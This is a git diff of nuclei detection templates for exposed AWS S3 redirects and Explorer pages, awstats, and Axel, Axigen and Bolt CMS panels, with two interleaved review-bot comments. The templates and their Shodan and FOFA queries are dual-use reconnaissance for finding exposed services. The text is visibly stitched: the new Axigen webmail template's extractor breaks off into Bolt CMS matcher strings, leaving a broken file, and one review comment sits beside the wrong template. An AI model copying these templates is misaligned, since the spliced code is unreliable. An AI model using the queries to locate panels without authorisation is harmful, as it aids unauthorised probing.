diff --git a/nuclei-templates/Other/aws-redirect-652.yaml b/nuclei-templates/Other/aws-redirect-652.yaml new file mode 100644 index 0000000000..010dbbfeca --- /dev/null +++ b/nuclei-templates/Other/aws-redirect-652.yaml @@ -0,0 +1,24 @@ +id: aws-redirect + +info: + name: Subdomain takeover AWS S3 + author: manikanta a.k.a @secureitmania + severity: info + reference: https://link.medium.com/fgXKJHR9P7 + tags: aws + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: false + matchers-condition: and + matchers: + - type: status + status: + - 307 + - type: word + words: + - 'Location: https://aws.amazon.com/s3/' + part: header diff --git a/nuclei-templates/Other/aws-redirect-654.yaml b/nuclei-templates/Other/aws-redirect-654.yaml deleted file mode 100644 index 1826635a49..0000000000 --- a/nuclei-templates/Other/aws-redirect-654.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: aws-redirect - -info: - name: Subdomain takeover AWS S3 - author: manikanta a.k.a @secureitmania - severity: info - reference: https://link.medium.com/fgXKJHR9P7 - tags: aws,takeover - -requests: - - method: GET - path: - - '{{BaseURL}}' - - redirects: false - matchers-condition: and - matchers: - - type: status - status: - - 307 - - type: word - words: - - 'Location: https://aws.amazon.com/s3/' - part: header diff --git a/nuclei-templates/Other/aws-s3-explorer.yaml b/nuclei-templates/Other/aws-s3-explorer.yaml index 0f14918cbb..4b41eb224e 100644 --- a/nuclei-templates/Other/aws-s3-explorer.yaml +++ b/nuclei-templates/Other/aws-s3-explorer.yaml 
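Review bot: The new copy's `tags: aws` drops the `takeover` tag that the aws-redirect-654.yaml deleted in the same commit carried, although the template is named `Subdomain takeover AWS S3`; anyone selecting templates with `-tags takeover` will no longer run it. Restore it as `tags: aws,takeover`. Apart from that line the two files are identical, so this would have been clearer as a rename than as a delete plus add.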
@@ -1,17 +1,23 @@ id: aws-s3-explorer info: - name: AWS S3 Explorer + name: Amazon Web Services S3 Explorer - Detect author: DhiyaneshDk - severity: low + severity: medium + description: Amazon Web Services S3 Explorer page was detected. Page contains links to sensitive information. reference: - https://www.exploit-db.com/ghdb/7967 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 metadata: verified: true + max-request: 1 google-query: inurl:s3.amazonaws.com intitle:"AWS S3 Explorer" tags: s3,edb,misconfig,aws,amazon -requests: +http: - method: GET path: - "{{BaseURL}}/index.html" @@ -30,3 +36,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a0047304502205fce419ac3d0a664585c93c727a799c3d68f9fac6796f3ead48bc2b31ca037f5022100919b5659cd25594daf725aa14fac287c4d0d2527293012b2da8c29308e5102fe:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/aws-xray-application.yaml b/nuclei-templates/Other/aws-xray-application.yaml index 2ad692af12..8621b81796 100644 --- a/nuclei-templates/Other/aws-xray-application.yaml +++ b/nuclei-templates/Other/aws-xray-application.yaml @@ -9,10 +9,11 @@ info: - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5566269380103557/ metadata: verified: true + max-request: 1 shodan-query: title:"AWS X-Ray Sample Application" tags: misconfig,aws,x-ray,amazon -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -32,3 +33,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a00473045022100dbe3c017b302cdf46850fa902720549499d2f9397a3fc4f9cfa7d8b4a6cec319022067762d58480d093919ffeda2e012fb6e00014e4b2c8b21f764a71a49d829a7bb:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/awstats-listing.yaml b/nuclei-templates/Other/awstats-listing.yaml index 30d7c58c91..a52056d0c2 100644 --- a/nuclei-templates/Other/awstats-listing.yaml +++ b/nuclei-templates/Other/awstats-listing.yaml 
@@ -5,16 +5,17 @@ info: author: tess severity: low description: Searches for exposed awstats Internal Information. + metadata: + max-request: 1 tags: misconfig,aws,exposure,amazon,awstats,oss -requests: +http: - method: GET path: - "{{BaseURL}}/awstats/data" matchers-condition: and matchers: - - type: word part: body words: @@ -25,3 +26,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a004730450220245efaddd842982f46f8eaa5737bc4e1a85fa38340f97a29dbc5012cb135f745022100fa5de8029489b49cd144c2b06f80ed0e1a785293d839c76d957afd58f61778ff:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/awstats-script-658.yaml b/nuclei-templates/Other/awstats-script-658.yaml index 9a81b722f3..3631c6a328 100644 --- a/nuclei-templates/Other/awstats-script-658.yaml +++ b/nuclei-templates/Other/awstats-script-658.yaml @@ -4,7 +4,7 @@ info: name: AWStats script author: sheikhrishad severity: info - tags: config,exposure + tags: config,exposure,awstats requests: - method: GET @@ -20,9 +20,9 @@ requests: - "Do not remove this line" - type: word + part: header words: - "application/x-perl" - part: header - type: status status: diff --git a/nuclei-templates/Other/axel-webserver.yaml b/nuclei-templates/Other/axel-webserver.yaml index e59777817e..4bf951cac5 100644 --- a/nuclei-templates/Other/axel-webserver.yaml +++ b/nuclei-templates/Other/axel-webserver.yaml @@ -7,15 +7,15 @@ info: description: Axel WebServer panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true - shodan-query: http.title:"Axel" fofa-query: app="AxelWebServer" + max-request: 1 + shodan-query: http.title:"Axel" + verified: true tags: panel,axel,webserver -requests: +http: - method: GET path: - "{{BaseURL}}" 
@@ -37,5 +37,4 @@ requests: group: 1 regex: - 'Axel MyWeb (.*)' - -# Enhanced by md on 2022/11/01 +# digest: 4a0a0047304502210096153e74c6a2e5ac1654dba3ab425d62798426f6989aabf3d67a1971b7319c1502206fd9fb03d2f6bc24884cc51fa767485e2bfcdde7809c9f7c54733fff531f3fde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/axigen-mail-server-detect.yaml b/nuclei-templates/Other/axigen-mail-server-detect.yaml index f81ad80603..86d00cf935 100644 --- a/nuclei-templates/Other/axigen-mail-server-detect.yaml +++ b/nuclei-templates/Other/axigen-mail-server-detect.yaml @@ -4,22 +4,26 @@ info: name: Axigen Mail Server Detection author: pikpikcu severity: info + description: | + Axigen Mail Server was detected. metadata: - verified: true fofa-query: app="axigen-Mail-Server" + max-request: 1 shodan-query: product:"Axigen" - tags: network,axigen + verified: true + tags: network,axigen,detect,smtp -network: +tcp: - inputs: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers: - type: word words: - "Axigen ESMTP" - "AXIGEN" +# digest: 4b0a00483046022100e1fa011d406f62fafa793206aa46b39b74acd39b8d5e853c603698edd112e9a2022100b13d7b060a09c9579aa32b707cbf6d4b45a7c7a6eddee8ea75b8d34813f0800a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/axigen-webadmin-660.yaml b/nuclei-templates/Other/axigen-webadmin-660.yaml index 0e54704559..515f319cbe 100644 --- a/nuclei-templates/Other/axigen-webadmin-660.yaml +++ b/nuclei-templates/Other/axigen-webadmin-660.yaml @@ -7,14 +7,11 @@ info: description: An Axigen Web Admin panel was discovered. reference: - https://www.axigen.com/ - metadata: - shodan-query: 'http.title:"Axigen WebAdmin"' - tags: axigen,panel classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Axigen WebAdmin" + tags: axigen,panel requests: - method: GET 
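Review bot: The host list is reduced to `{{Hostname}}` with a template-level `port: 25`, where the old form also probed `{{Host}}:25` explicitly; whether nuclei's `tcp` protocol applies the template `port` when the input already carries a port, or prefers the input's port, is not visible here and decides whether an input such as `host:587` still reaches SMTP. Confirm the intended precedence and, if the template port is meant to win, say so in the new `description`, e.g. `Connects to port 25 regardless of any port given in the input.`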
diff --git a/nuclei-templates/Other/axigen-webmail-662.yaml b/nuclei-templates/Other/axigen-webmail-662.yaml new file mode 100644 index 0000000000..0b61e4d8bd --- /dev/null +++ b/nuclei-templates/Other/axigen-webmail-662.yaml @@ -0,0 +1,40 @@ +id: axigen-webmail + +info: + name: Axigen WebMail PanelDetection + author: dhiyaneshDk,idealphase + severity: info + description: An Axigen webmail panel was discovered. + reference: + - https://www.axigen.com/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Axigen WebMail" + tags: axigen,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)(Axigen WebMail)' + - 'Axigen Standard Webmail - (.*)' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + part: body + regex: + - '' + - '' + - 'Bolt requires JavaScript to function properly and continuing without it might corrupt or erase data.' + - 'Bolt » Login' + - 'Cookies are required to log on to Bolt. Please allow cookies.' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/bolt-cms-panel-763.yaml b/nuclei-templates/Other/bolt-cms-panel-763.yaml deleted file mode 100644 index 89c9f2e25c..0000000000 --- a/nuclei-templates/Other/bolt-cms-panel-763.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: bolt-cms-panel - -info: - name: bolt CMS Login Panel - author: cyllective,daffainfo - severity: info - description: Bolt is a simple CMS written in PHP. It is based on Silex and Symfony components, uses Twig and either SQLite, MySQL or PostgreSQL. - reference: - - https://github.com/bolt/bolt - tags: panel,bolt,cms,login - -requests: - - method: GET - path: - - "{{BaseURL}}/bolt/login" - - matchers-condition: and - matchers: - - type: word - part: body - condition: or - words: - - '